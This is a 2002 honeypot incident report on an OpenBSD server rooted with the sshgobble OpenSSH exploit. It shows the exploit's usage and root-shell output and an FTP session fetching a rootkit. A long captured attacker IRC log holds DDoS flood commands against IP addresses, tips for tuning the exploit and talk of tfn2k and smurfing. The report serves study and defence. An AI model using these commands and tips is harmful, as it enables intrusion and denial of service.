Our OpenBSD 3.0 honeypot was successfully hacked the 07. August 2002. Honeynet Project has captured some nice packets about this hack and this is the subject of the small report.
The exploit
Our openBSD 3.0 server was compromised using the first know exploit since about 6 year of OpenBSD history. The exploit is know under the name SSH GOBBLE. You’ll find a command line extract:
$ ./sshgobble
GOBBLES SECURITY - WHITEHATS POSTING TO BUGTRAQ FOR FAME
OpenSSH 2.9.9 - 3.3 remote challenge-response exploit
#1 rule of ``ethical hacking'': drop dead
Usage: sshgobble [options] host
Options:
***** READ THE HOWTO FILE IN THE TARBALL *****
-l user Log in using this user name.
-p port Connect to this port. Server must be on the same port.
-M method Select the device (skey or bsdauth)
default: bsdauth
-S style If using bsdauth, select the style
default: skey
-d rep Test shellcode repeat
default: 10000 (with -z) ; 0 (without -z)
-j size Chunk size
default: 4096 (1 page)
-r rep Connect-back shellcode repeat
default: 60 (not used with -z)
-z Enable testing mode
-v Verbose; display verbose debugging messages.
Multiple -v increases verbosity.
$ ./sshgobble -l root 192.168.200.146
[*] remote host supports ssh2
Warning: Permanently added '192.168.200.146' (RSA) to the list of known hosts.
[*] server_user: root:skey
[*] keyboard-interactive method available
[*] chunk_size: 4096 tcode_rep: 0 scode_rep 60
[*] mode: exploitation
*GOB
uname -a;i
OpenBSD openbsd 3.0 GENERIC#94 i386.
uid=0(root) gid=0(wheel) groups=0(wheel).
exit
read(): Connection reset by peer
$
Download some tools
After successfully compromising our OpenBSD honeypot our scripty kiddies downloaded a rootkit and connected from our server to efnet.demon.co.uk IRC server and started perfomring different tasks. Below the ftp connection:
cd /b ftp audiopimp.hypermart.net USER audiopimp PASS starfucker 230 User audiopimp logged in... SYS 215 UNIX Type: L8 get b.tg TYPE I 200 Type set to I.. SIZE b.tgz 213 16666 EPS 500 EPSV not understood.. Name (audiopimp.hypermart.net:root): EPSV not understood.. PAS 227 Entering Passive Mode (66,150,0,154,10,86)... RETR b.tgz 150 Opening BINARY mode data connection for b.tgz (16666 bytes)... 226 Transfer complete.. MDTM b.tgz qu MDTM b.tgz QUI Goodbye.
IRC client used
Thanks to Keith Bruss that pointed me to this information: Script kiddies installed the
kaiten.c
program. This is a IRC based distributed denial of service client. It connects to the server and accepts commands via the channel specified. More informations about the capabilities of this IRC client can be found here. This was used as a ddos tool but was killed by efnet.
IRC channel still active Fri Aug 23 11:36:29 CEST 2002
Thanks to Ace that pointed me to this information: The channel
#exo
is still around on efnet, I joined it to see if they were still there, and about 3 of their bots are left there:
#exo CHGLIZ H root@alh248008.alhsys.es (SHKVM) #exo CNQJ H root@alh248008.alhsys.es (QFGLO) #exo APCDIL H ~NATOJ@meggy.telerete.it (JEHE) #exo IZELCLG H ~QXGBMRYX@meggy.telerete.it (JWPSHYXU) #exo spubar H spubar@216.12.86.13 (SPUUUU!!) #exo bill H@ bill@elvis.mu.org (Bill Jonus)
Using bash and starting IRC chatting
When you log into an OpenBSD server you don’t have the confortable bash shell. So the first action the script kiddies performed was to start a bash from the downloaded binary and then started the IRC client:
./ls .cat.chgrp.chio.chmod.cp.cpio.csh.date.dd.df.domainname.echo.ed.eject.expr .hostname.kill.ksh.ln.ls.md5.mkdir.mt.mv.pax.ps.pwd.rcp.rksh.rm.rmail.rmd160 .rmdir.sh.sha1.sleep.stty.sync.tar.test. ./"bash /usr/libexec/ld.so: warning: libc.so.28.0: minor version expected, using it anyway efnet.demon.co.uk NOTICE QBOBGZM :*** Banned: ircing as root is bad (2001/10/0503.27).. ERROR :Closing Link: QBOBGZM[root@255.255.255.255] (Banned) PING :irc.secsup.uu.net. PONG :irc.secsup.uu.net
Enjoy the conversation
In this last section you can enjoy the conversation that took place on our hacked OpenBSD IRC server.
K1m!~K1m@most.wanted.terrori.st ::)
K1m!~K1m@most.wanted.terrori.st :'.no
Ronn|e!~Stargazer@stargazer.counterstrike.at :new one
Ronn|e!~Stargazer@stargazer.counterstrike.at :hehehe
K1m!~K1m@most.wanted.terrori.st :hehe
Ronn|e!~Stargazer@stargazer.counterstrike.at :lemme start it up
K1m!~K1m@most.wanted.terrori.st :a fast one
K1m!~K1m@most.wanted.terrori.st :did you ever test the net last night ?
Ronn|e!~Stargazer@stargazer.counterstrike.at :ya ,tried it with that dude on cable, just using that 6* net
Ronn|e!~Stargazer@stargazer.counterstrike.at :lol
Ronn|e!~Stargazer@stargazer.counterstrike.at :coming now new one
Ronn|e!~Stargazer@stargazer.counterstrike.at :there we go !
Ronn|e!~Stargazer@stargazer.counterstrike.at :coming now new one !
Ronn|e!~Stargazer@stargazer.counterstrike.at :there we go
Ronn|e!~Stargazer@stargazer.counterstrike.at :siria !
Ronn|e!~Stargazer@stargazer.counterstrike.at :lol
Ronn|e!~Stargazer@stargazer.counterstrike.at :wtf
Ronn|e!~Stargazer@stargazer.counterstrike.at :hahahahaha
K1m!~K1m@most.wanted.terrori.st :=)
Ronn|e!~Stargazer@stargazer.counterstrike.at :there we go
Ronn|e!~Stargazer@stargazer.counterstrike.at :there we gooooooooooo
Ronn|e!~Stargazer@stargazer.counterstrike.at :bbb.se
Ronn|e!~Stargazer@stargazer.counterstrike.at :hehehee
K1m!~K1m@most.wanted.terrori.st ::)
Ronn|e!~Stargazer@stargazer.counterstrike.at :this was already scanned, but the bot was not running
K1m!~K1m@most.wanted.terrori.st :reboot maybe
Ronn|e!~Stargazer@stargazer.counterstrike.at :haha brutal
K1m!~K1m@most.wanted.terrori.st :yes
K1m!~K1m@most.wanted.terrori.st :=)
K1m!~K1m@most.wanted.terrori.st :how do we get ops
K1m!~K1m@most.wanted.terrori.st :from these
K1m!~K1m@most.wanted.terrori.st :bots
K1m!~K1m@most.wanted.terrori.st :| CZIHIV (~JGTA@217.71.230.58)
K1m!~K1m@most.wanted.terrori.st :is nto working
K1m!~K1m@most.wanted.terrori.st :its maybe a channel logger
Ronn|e!~Stargazer@stargazer.counterstrike.at :lol
K1m!~K1m@most.wanted.terrori.st :ban him ?
K1m!~K1m@most.wanted.terrori.st :| CZIHIV (~JGTA@217.71.230.58)..:
K1m!~K1m@most.wanted.terrori.st :| name : AHYPST..:
K1m!~K1m@most.wanted.terrori.st :| chan : #exo..:
K1m!~K1m@most.wanted.terrori.st :| serv : irc.mpls.ca
K1m!~K1m@most.wanted.terrori.st :| idle : 3hrs 2mins 4secs (signed on Wed Aug 07 12:23:57 2002)
Ronn|e!~Stargazer@stargazer.counterstrike.at :seems dead
Ronn|e!~Stargazer@stargazer.counterstrike.at :hrm
Ronn|e!~Stargazer@stargazer.counterstrike.at :maybe that client was simple dead, waiting for pinging out
Ronn|e!~Stargazer@stargazer.counterstrike.at :let's check
K1m!~K1m@most.wanted.terrori.st :i dont think so
Ronn|e!~Stargazer@stargazer.counterstrike.at :well, let's keep the ban
Ronn|e!~Stargazer@stargazer.counterstrike.at :will wait for mtrez to verify the stuff
Ronn|e!~Stargazer@stargazer.counterstrike.at :im gonna change the source code of the kaiten bot
K1m!~K1m@most.wanted.terrori.st ::)
Ronn|e!~Stargazer@stargazer.counterstrike.at :so at least, the channel config, will be encripted
Ronn|e!~Stargazer@stargazer.counterstrike.at :and such stuff
K1m!~K1m@most.wanted.terrori.st :nice
Ronn|e!~Stargazer@stargazer.counterstrike.at :it won't surprise me people joins here
Ronn|e!~Stargazer@stargazer.counterstrike.at :lol
K1m!~K1m@most.wanted.terrori.st :hehe
K1m!~K1m@most.wanted.terrori.st :thats no good
Ronn|e!~Stargazer@stargazer.counterstrike.at :getting a new one, with the buffer explit thingie
or whtever is called, hopefully
K1m!~K1m@most.wanted.terrori.st :ssh ?
Ronn|e!~Stargazer@stargazer.counterstrike.at :that crap with the params
Ronn|e!~Stargazer@stargazer.counterstrike.at :ya
K1m!~K1m@most.wanted.terrori.st :ok
Ronn|e!~Stargazer@stargazer.counterstrike.at :owned !
Ronn|e!~Stargazer@stargazer.counterstrike.at :[root@onview4 openssh-3.4p1]#
./ssh -l root 4.61.244.147 -M bsdauth -S skey -j 4096 -d 3050
Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] remote host supports ssh2
Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] server_user: root:skey..:
Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] keyboard-interactive method available..:
Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] chunk_size: 4096 tcode_rep: 3050 scode_rep 60
Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] mode: exploitation
Ronn|e!~Stargazer@stargazer.counterstrike.at :*GOBBLE*
Ronn|e!~Stargazer@stargazer.counterstrike.at :OpenBSD jupiter 3.0 GENERIC#94 i386
Ronn|e!~Stargazer@stargazer.counterstrike.at :uid=0(root) gid=0(wheel) groups=0(wheel)
Ronn|e!~Stargazer@stargazer.counterstrike.at :*GOOBLE* !
Ronn|e!~Stargazer@stargazer.counterstrike.at :hehehehe
K1m!~K1m@most.wanted.terrori.st :lol
K1m!~K1m@most.wanted.terrori.st :i have to learn thaat
Ronn|e!~Stargazer@stargazer.counterstrike.at :i figured it out
Ronn|e!~Stargazer@stargazer.counterstrike.at :though
Ronn|e!~Stargazer@stargazer.counterstrike.at :the doc about that part sucks
Ronn|e!~Stargazer@stargazer.counterstrike.at :you first try in test mode, til it stalls, not always work also
Ronn|e!~Stargazer@stargazer.counterstrike.at :when you get the first stall value, then you try with -d
Ronn|e!~Stargazer@stargazer.counterstrike.at :and find the value that doesn't make it hang, closest to the one to the one
Ronn|e!~Stargazer@stargazer.counterstrike.at :that hangs
Ronn|e!~Stargazer@stargazer.counterstrike.at :and such shit
K1m!~K1m@most.wanted.terrori.st :=)
Ronn|e!~Stargazer@stargazer.counterstrike.at :yat !
Ronn|e!~Stargazer@stargazer.counterstrike.at :yay !
K1m!~K1m@most.wanted.terrori.st :hmmm ?
Ronn|e!~Stargazer@stargazer.counterstrike.at :you started it twice ?
K1m!~K1m@most.wanted.terrori.st :i did`nt start it
Ronn|e!~Stargazer@stargazer.counterstrike.at :coz sounds like the admin ran the bot twice, and then killed the service
K1m!~K1m@most.wanted.terrori.st :i guess
Ronn|e!~Stargazer@stargazer.counterstrike.at :i see
K1m!~K1m@most.wanted.terrori.st :the same
K1m!~K1m@most.wanted.terrori.st :hehe
K1m!~K1m@most.wanted.terrori.st :lol
K1m!~K1m@most.wanted.terrori.st :fuck
K1m!~K1m@most.wanted.terrori.st :i bet he mailing that file
K1m!~K1m@most.wanted.terrori.st :to some antivirus
Ronn|e!~Stargazer@stargazer.counterstrike.at :*GOBBLE*
Ronn|e!~Stargazer@stargazer.counterstrike.at :OpenBSD www.perlcn.homeip.net 3.0 GENERIC#1 i386
Ronn|e!~Stargazer@stargazer.counterstrike.at :uid=0(root) gid=0(wheel) groups=0(wheel)
Ronn|e!~Stargazer@stargazer.counterstrike.at :gooble !!!
K1m!~K1m@most.wanted.terrori.st :=)
Ronn|e!~Stargazer@stargazer.counterstrike.at :that gobble shit is funny
K1m!~K1m@most.wanted.terrori.st :is it hard to get the channel stuff encryptet ?
Ronn|e!~Stargazer@stargazer.counterstrike.at :oh nope
Ronn|e!~Stargazer@stargazer.counterstrike.at :i mean, at least bascily
K1m!~K1m@most.wanted.terrori.st :ok
Ronn|e!~Stargazer@stargazer.counterstrike.at :encrypt each char with an xor, that's what id do hehe
K1m!~K1m@most.wanted.terrori.st :ok
K1m!~K1m@most.wanted.terrori.st :=)
Ronn|e!~Stargazer@stargazer.counterstrike.at :at least is not in plain ascii on the binary
K1m!~K1m@most.wanted.terrori.st :true
K1m!~K1m@most.wanted.terrori.st :where is mtrez ?
K1m!~K1m@most.wanted.terrori.st :asleep ?
Ronn|e!~Stargazer@stargazer.counterstrike.at :prolly
K1m!~K1m@most.wanted.terrori.st :oki
K1m!~K1m@most.wanted.terrori.st :=)
K1m!~K1m@most.wanted.terrori.st :shuld have the channel +i
K1m!~K1m@most.wanted.terrori.st :and just somethimes
K1m!~K1m@most.wanted.terrori.st :let the bots in
Ronn|e!~Stargazer@stargazer.counterstrike.at :maybe jsut set up a relay bot
Ronn|e!~Stargazer@stargazer.counterstrike.at :and idle in another channel
K1m!~K1m@most.wanted.terrori.st :yes
K1m!~K1m@most.wanted.terrori.st :=)
Ronn|e!~Stargazer@stargazer.counterstrike.at :and send the commands from there
K1m!~K1m@most.wanted.terrori.st :smart
Ronn|e!~Stargazer@stargazer.counterstrike.at :hrm
Ronn|e!~Stargazer@stargazer.counterstrike.at :hahahahaha
Ronn|e!~Stargazer@stargazer.counterstrike.at :this one was funny
Ronn|e!~Stargazer@stargazer.counterstrike.at :the box was owned
Ronn|e!~Stargazer@stargazer.counterstrike.at :and the bot was started
Ronn|e!~Stargazer@stargazer.counterstrike.at :but the admin, deleted the "bash " file
K1m!~K1m@most.wanted.terrori.st :hehe
Ronn|e!~Stargazer@stargazer.counterstrike.at :but forgot to kill the process
K1m!~K1m@most.wanted.terrori.st :.o.
K1m!~K1m@most.wanted.terrori.st :lol
K1m!~K1m@most.wanted.terrori.st :dumb admin
Ronn|e!~Stargazer@stargazer.counterstrike.at :okay i killed the wrong pid
Ronn|e!~Stargazer@stargazer.counterstrike.at :lol
* IRC msg loverbo pell deg av irc, din pedofaen
Ronn|e!~Stargazer@stargazer.counterstrike.at :lololol
K1m!~K1m@most.wanted.terrori.st :its a newbe
K1m!~K1m@most.wanted.terrori.st :that tryes to get young girls
Ronn|e!~Stargazer@stargazer.counterstrike.at :hehe
K1m!~K1m@most.wanted.terrori.st :at my hometown channel
K1m!~K1m@most.wanted.terrori.st :pedophile
Ronn|e!~Stargazer@stargazer.counterstrike.at :ouch
Ronn|e!~Stargazer@stargazer.counterstrike.at :*GOOBLE* again !
Ronn|e!~Stargazer@stargazer.counterstrike.at :hehe
Ronn1e!ronnie@lostforever.org :seems an irc server crashed or some shit
K1m!~K1m@most.wanted.terrori.st :yes
Ronn1e!ronnie@lostforever.org :*GOBBLE*
Ronn1e!ronnie@lostforever.org :*GOBBLE*
Ronn1e!ronnie@lostforever.org :hahhaahha
Ronn1e!ronnie@lostforever.org :this shit rule
* pan 217.8.141.113 1234 10
K1m!~K1m@most.wanted.terrori.st :=)
Ronn1e!ronnie@lostforever.org :wohaa
Ronn1e!ronnie@lostforever.org :it came fucking fast
K1m!~K1m@most.wanted.terrori.st :fuck
K1m!~K1m@most.wanted.terrori.st :that was powerull
K1m!~K1m@most.wanted.terrori.st :i felt it all over here
Ronn1e!ronnie@lostforever.org :hahahaha
K1m!~K1m@most.wanted.terrori.st :and i pinger another user
K1m!~K1m@most.wanted.terrori.st :on my isp
K1m!~K1m@most.wanted.terrori.st :my download
K1m!~K1m@most.wanted.terrori.st :did drop down to 2 kbp
K1m!~K1m@most.wanted.terrori.st :from 225
Ronn1e!ronnie@lostforever.org :lolololol
Ronn1e!ronnie@lostforever.org :HAHAHAHAHA
Ronn1e!ronnie@lostforever.org :that's brutal !
K1m!~K1m@most.wanted.terrori.st :for some secs
K1m!~K1m@most.wanted.terrori.st :my ips have several 34 mbits
K1m!~K1m@most.wanted.terrori.st :lines
Ronn1e!ronnie@lostforever.org :*GOOBLE* !!
Ronn1e!ronnie@lostforever.org :lol
Ronn1e!ronnie@lostforever.org :K1m, do !eXo* instead of !* otherwise mtrez scanning bots packet people too.
K1m!~K1m@most.wanted.terrori.st :ok
K1m!~K1m@most.wanted.terrori.st ::)
Ronn1e!ronnie@lostforever.org :i found out
Ronn1e!ronnie@lostforever.org :the most vulnerable versions
Ronn1e!ronnie@lostforever.org :i mena, easiest to root
Ronn1e!ronnie@lostforever.org :are
Ronn1e!ronnie@lostforever.org :3.02--->3.0--->
Ronn1e!ronnie@lostforever.org :i found a lot on those three versions
K1m!~K1m@most.wanted.terrori.st ::)
K1m!~K1m@most.wanted.terrori.st :mrez
K1m!~K1m@most.wanted.terrori.st :mtrez
K1m!~K1m@most.wanted.terrori.st :shuld make a script
K1m!~K1m@most.wanted.terrori.st :that did *!nick version
K1m!~K1m@most.wanted.terrori.st :every time a bot joined
K1m!~K1m@most.wanted.terrori.st :and if it not replyed
K1m!~K1m@most.wanted.terrori.st :then +b
Ronn1e!ronnie@lostforever.org :and scripted, should sort the bot nicks
Ronn1e!ronnie@lostforever.org :lol
Ronn1e!ronnie@lostforever.org :with privmsg or some shit
Ronn1e!ronnie@lostforever.org :hahaahah
Ronn1e!ronnie@lostforever.org :make channel order
Ronn1e!ronnie@lostforever.org :lol
Ronn1e!ronnie@lostforever.org :*GOBBLE* AGAIN !
Ronn1e!ronnie@lostforever.org :blub
Ronn1e!ronnie@lostforever.org :hehehehe
Ronn1e!ronnie@lostforever.org :sucks, it doesn't even have LS
Ronn1e!ronnie@lostforever.org :this shell is fucked
Ronn1e!ronnie@lostforever.org :GOOBLE AGAIN !
Ronn1e!ronnie@lostforever.org :hehehe
Ronn1e!ronnie@lostforever.org :hey
Ronn1e!ronnie@lostforever.org :sorted a new one
Ronn1e!ronnie@lostforever.org :besides this one that just joined
Ronn1e!ronnie@lostforever.org :and he is running eggdrops and stuff
K1m!~K1m@most.wanted.terrori.st :lol
K1m!~K1m@most.wanted.terrori.st :=)
Ronn1e!ronnie@lostforever.org :byfrost 28077 0.0 2.3 1372 752 C0- SN 25Jun02 20:15.48 ./eggdrop egg
Ronn1e!ronnie@lostforever.org :lo synth
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :OMFG
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION just died.
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION heart is ready to explode.
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION trys to calm down.
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :heheh
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :not working fast enough for u?
Ronn1e!ronnie@lostforever.org :it was replying to pings !
Ronn1e!ronnie@lostforever.org :no doesn't reply anymore
Ronn1e!ronnie@lostforever.org :lol
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :heheh
eXo-0* PAN 195.178.180.113 22 600
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :he is untouchable
Ronn1e!ronnie@lostforever.org :can't be
Ronn1e!ronnie@lostforever.org :lol
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :ROFL
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :u can take just about anything out then
SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :hahah
K1m!~K1m@most.wanted.terrori.st :lol
K1m!~K1m@most.wanted.terrori.st :=)
Ronn1e!ronnie@lostforever.org :they got crazy
K1m!~K1m@most.wanted.terrori.st :who ?
Ronn1e!ronnie@lostforever.org :those bots
Ronn1e!ronnie@lostforever.org :don't want to change nick
Ronn1e!ronnie@lostforever.org :plus
Ronn1e!ronnie@lostforever.org :eXo-03
Ronn1e!ronnie@lostforever.org :is on efnet
Ronn1e!ronnie@lostforever.org :but not on this channel
Ronn1e!ronnie@lostforever.org :lol
K1m!~K1m@most.wanted.terrori.st :lagged
K1m!~K1m@most.wanted.terrori.st :still
Ronn1e!ronnie@lostforever.org :he has not figuredo ut how to join
Ronn1e!ronnie@lostforever.org :ya
Ronn1e!ronnie@lostforever.org :question
Ronn1e!ronnie@lostforever.org :the
Ronn1e!ronnie@lostforever.org :SSH-1.99-OpenSSH_3.1p1
Ronn1e!ronnie@lostforever.org :the p1
Ronn1e!ronnie@lostforever.org :what means ? patched maybe ?
K1m!~K1m@most.wanted.terrori.st :not sure
Ronn1e!ronnie@lostforever.org :i see, with those there's no luck apparently
K1m!~K1m@most.wanted.terrori.st :did they restart the process
Joar!~toxica@grendel.csc.smith.edu :hehe, du tar knekken p. hele gjengen jo :D
Ronn1e!ronnie@lostforever.org :3.3 version is theorically explotaible ?
Joar!~toxica@grendel.csc.smith.edu :OpenSSH?
Ronn1e!ronnie@lostforever.org :ya
Joar!~toxica@grendel.csc.smith.edu :I`ve seen people discussing it, but I dont know
Ronn1e!ronnie@lostforever.org :i see
eXo-96!~K1m@most.wanted.terrori.st :fuck
Ronn1e!ronnie@lostforever.org :well, the how to says A vulnerable OpenSSH 2.9.9 - 3.3 sshd
eXo-96!~K1m@most.wanted.terrori.st :that box was to fast
Ronn1e!ronnie@lostforever.org :so not sure if those two versions are included or excluded
eXo-96!~K1m@most.wanted.terrori.st :| idle : 36secs (signed on Fri Jul 12 18:15:49 2002)
eXo-96!~K1m@most.wanted.terrori.st :it lagged
Joar!~toxica@grendel.csc.smith.edu :mm
eXo-96!~K1m@most.wanted.terrori.st :but did not die
Ronn1e!ronnie@lostforever.org :some bots are very lagged
Ronn1e!ronnie@lostforever.org :give it some secs more
eXo-96!~K1m@most.wanted.terrori.st :i killed it
Joar!~toxica@grendel.csc.smith.edu :hehe
Joar!~toxica@grendel.csc.smith.edu :lurer p. hvor mange mbit som ble sendt avg.rde der
HJKSHE!~K1m@most.wanted.terrori.st :ikke lite
Ronn1e!ronnie@lostforever.org :*GOBBLE!*
HJKSHE!~K1m@most.wanted.terrori.st :fuck
HJKSHE!~K1m@most.wanted.terrori.st :some of them are laggggged
MTrez!mtrez@theprojext.com :?
HJKSHE!~K1m@most.wanted.terrori.st ::)
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :ehhe
MTrez!mtrez@theprojext.com :carefull about crashing the bots
MTrez!mtrez@theprojext.com :restarting all these is a pain in the arse
MTrez!mtrez@theprojext.com :;p
HJKSHE!~K1m@most.wanted.terrori.st :did not wrk
MTrez!mtrez@theprojext.com :MSG
MTrez!mtrez@theprojext.com :not msg
MTrez!mtrez@theprojext.com :irc protocol is very specific
* IRC MSG _b_ test
MTrez!mtrez@theprojext.com :avoid ever doing that to a person unless you trust them though
MTrez!mtrez@theprojext.com :wouldnt be too difficult to reroot all these boxes
MTrez!mtrez@theprojext.com :heh
HJKSHE!~K1m@most.wanted.terrori.st :i know
HJKSHE!~K1m@most.wanted.terrori.st :uts my bot
HJKSHE!~K1m@most.wanted.terrori.st :its my bot
HJKSHE!~K1m@most.wanted.terrori.st :i just wanna see if it worked
MTrez!mtrez@theprojext.com :you cant win em all ;)
HJKSHE!~K1m@most.wanted.terrori.st :what if the ssh
HJKSHE!~K1m@most.wanted.terrori.st :makes logs
HJKSHE!~K1m@most.wanted.terrori.st :on those box`s
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :thats why ya gott be quick
MTrez!mtrez@theprojext.com :i only log in and issue about 4-5 commands
MTrez!mtrez@theprojext.com :then i log out
MTrez!mtrez@theprojext.com :and im done
HJKSHE!~K1m@most.wanted.terrori.st :do you know if it does ?
MTrez!mtrez@theprojext.com :it might, depending on the system configuration
HJKSHE!~K1m@most.wanted.terrori.st :ok
HJKSHE!~K1m@most.wanted.terrori.st :did the nl die `?
HJKSHE!~K1m@most.wanted.terrori.st :linux
MTrez!mtrez@theprojext.com :i dont believe so
MTrez!mtrez@theprojext.com :i dont believe so
HJKSHE!~K1m@most.wanted.terrori.st :ok
HJKSHE!~K1m@most.wanted.terrori.st PRIVMSG #t3st :sjekk
Inion-awy!espen@213.151.138.8 PRIVMSG #t3st :fitte bra
MTrez!mtrez@theprojext.com :JOIN
* IRC part #t3st..:
eXo-76!~BKTGDUTO@193.10.236.161 PART #t3st..:
eXo-88!~XEDY@c-443572d5.017-51-7570701.cust.bredbandsbolaget.se PART #t3st
MTrez!mtrez@theprojext.com :irc protocol requires uppercase commands
MTrez!mtrez@theprojext.com :[11:35] <MTrez> do ya think i can get that obsd rk? :-/
MTrez!mtrez@theprojext.com :7> let me edit i
MTrez!mtrez@theprojext.com :woot
MTrez!mtrez@theprojext.com :we be gettin a obsd rk
HJKSHE!~K1m@most.wanted.terrori.st :?
MTrez!mtrez@theprojext.com :openbsd rootkit..:
HJKSHE!~K1m@most.wanted.terrori.st :ok =)
HJKSHE!~K1m@most.wanted.terrori.st :hehe
HJKSHE!~K1m@most.wanted.terrori.st :nice
MTrez!mtrez@theprojext.com :that guy coded one
MTrez!mtrez@theprojext.com :thats the 3rd time ive begged him for it
MTrez!mtrez@theprojext.com :bout time he gives it up
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :he shouldnt care about loosing some roots
MTrez!mtrez@theprojext.com :he has like 500+ openbsd roots
MTrez!mtrez@theprojext.com :heheh
HJKSHE!~K1m@most.wanted.terrori.st :fuck
HJKSHE!~K1m@most.wanted.terrori.st :=)
HJKSHE!~K1m@most.wanted.terrori.st :thats alot
MTrez!mtrez@theprojext.com :heh yeh
MTrez!mtrez@theprojext.com :he said he couldnt get his version of kaiten to work on openbsd though
MTrez!mtrez@theprojext.com :so i havent helped him out since he never gave me the rk ;p
HJKSHE!~K1m@most.wanted.terrori.st :ok
HJKSHE!~K1m@most.wanted.terrori.st :you think you can get it ?
MTrez!mtrez@theprojext.com :likely yes
MTrez!mtrez@theprojext.com :grr
MTrez!mtrez@theprojext.com :i cant get tfn2k to compile on openbsd
MTrez!mtrez@theprojext.com :pos
HJKSHE!~K1m@most.wanted.terrori.st :not good
MTrez!mtrez@theprojext.com :fixed it
MTrez!mtrez@theprojext.com ::)
HJKSHE!~K1m@most.wanted.terrori.st :=)
MTrez!mtrez@theprojext.com :woot
MTrez!mtrez@theprojext.com :tfn works
MTrez!mtrez@theprojext.com :openbsd binaries completed for the client
MTrez!mtrez@theprojext.com :server is available for linux
HJKSHE!~K1m@most.wanted.terrori.st :=)
MTrez!mtrez@theprojext.com :tfn2k also allows for smurfing
MTrez!mtrez@theprojext.com :which can amplify our bandwidth 3 times or more
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :thats pretty nasty.
HJKSHE!~K1m@most.wanted.terrori.st :smurfing no bo use
HJKSHE!~K1m@most.wanted.terrori.st :any longer
MTrez!mtrez@theprojext.com :my ASS
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :my friend still uses
MTrez!mtrez@theprojext.com :it
MTrez!mtrez@theprojext.com :its very very effective
HJKSHE!~K1m@most.wanted.terrori.st :cus you cant find proper amplifiers
MTrez!mtrez@theprojext.com :theres still tons
HJKSHE!~K1m@most.wanted.terrori.st :any longer
MTrez!mtrez@theprojext.com :there not very hard to find at all
HJKSHE!~K1m@most.wanted.terrori.st :www.powertech.no
HJKSHE!~K1m@most.wanted.terrori.st :scans
HJKSHE!~K1m@most.wanted.terrori.st :for it
HJKSHE!~K1m@most.wanted.terrori.st :and they report them
HJKSHE!~K1m@most.wanted.terrori.st :afher what i heard
HJKSHE!~K1m@most.wanted.terrori.st :smurf is useless
HJKSHE!~K1m@most.wanted.terrori.st :but im no expert
HJKSHE!~K1m@most.wanted.terrori.st :i had a scanner for bcasts
HJKSHE!~K1m@most.wanted.terrori.st :once
MTrez!mtrez@theprojext.com :gah
MTrez!mtrez@theprojext.com :gotta wait till he gets off work
MTrez!mtrez@theprojext.com :but once we get the rootkit
MTrez!mtrez@theprojext.com :i think ill install tfn2k on all the boxes
HJKSHE!~K1m@most.wanted.terrori.st :again
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :they must not have much bandwith, you rarely ever ping out
HJKSHE!~K1m@most.wanted.terrori.st :i know
MTrez!mtrez@theprojext.com :ehhe
MTrez!mtrez@theprojext.com :now we wait for 40 bots to ping out
MTrez!mtrez@theprojext.com :dont even think its effecting that shell
MTrez!mtrez@theprojext.com :you should always test with a 10-15 sec ddos
MTrez!mtrez@theprojext.com :to see if its worth it
Ronn|e!ronnie@lostforever.org :ya
Ronn|e!ronnie@lostforever.org :ya, true
MTrez!mtrez@theprojext.com :dont even bother with anything on foonet.net
MTrez!mtrez@theprojext.com :thats INSANE bandwidth
MTrez!mtrez@theprojext.com :and heavily filtered
Ronn|e!ronnie@lostforever.org :i see
MTrez!mtrez@theprojext.com :requires gigabit ddosnets
MTrez!mtrez@theprojext.com ::-/
Ronn|e!ronnie@lostforever.org :boooom
MTrez!mtrez@theprojext.com :i was thinking of getting a foonet.net colocation
MTrez!mtrez@theprojext.com :its insanely stable
MTrez!mtrez@theprojext.com :they dont even charge for down bandwidth
MTrez!mtrez@theprojext.com :so you can get ddosed
MTrez!mtrez@theprojext.com :and never get charged
MTrez!mtrez@theprojext.com :heh
MTrez!mtrez@theprojext.com :not to mention their core router filters all kinda attacks
HJKSHE!~K1m@most.wanted.terrori.st :www.foonet.net = lagged
HJKSHE!~K1m@most.wanted.terrori.st :as hell
MTrez!mtrez@theprojext.com :heh, they get lagged slightly cause of the traffic they handle
MTrez!mtrez@theprojext.com :but overall they can have decent latency
MTrez!mtrez@theprojext.com :its just the major shell providers on their network that are lagged
HJKSHE!~K1m@most.wanted.terrori.st :now its up again
MTrez!mtrez@theprojext.com :someday we'll have enough bandwidth to take out foonet.net
MTrez!mtrez@theprojext.com :;p
HJKSHE!~K1m@most.wanted.terrori.st :is it only the bots with bad conection that pings out ?
MTrez!mtrez@theprojext.com :well, sorta
MTrez!mtrez@theprojext.com :hehe
MTrez!mtrez@theprojext.com :its just the ones that max out their bandwidth
Ronn|e!ronnie@lostforever.org : 21 packets transmitted, 5 packets received, 76% packet loss..:
Ronn|e!ronnie@lostforever.org :hey mtrez, was kinda affecting it..:
Ronn|e!ronnie@lostforever.org :lol
Ronn|e!ronnie@lostforever.org :that's brutal
MTrez!mtrez@theprojext.com :hehe yah
MTrez!mtrez@theprojext.com :for foonet.net..:
YLCLS!~TGLWLMRM@meggy.telerete.it JOIN :#exo
MTrez!mtrez@theprojext.com :thats insane
MTrez!mtrez@theprojext.com :i know friends with tons of bandwidth that cant really take out foonet.net either
MTrez!mtrez@theprojext.com :they can take out irc servers but not foonet
MTrez!mtrez@theprojext.com :heheh
HJKSHE!~K1m@most.wanted.terrori.st :lol
HJKSHE!~K1m@most.wanted.terrori.st :btw
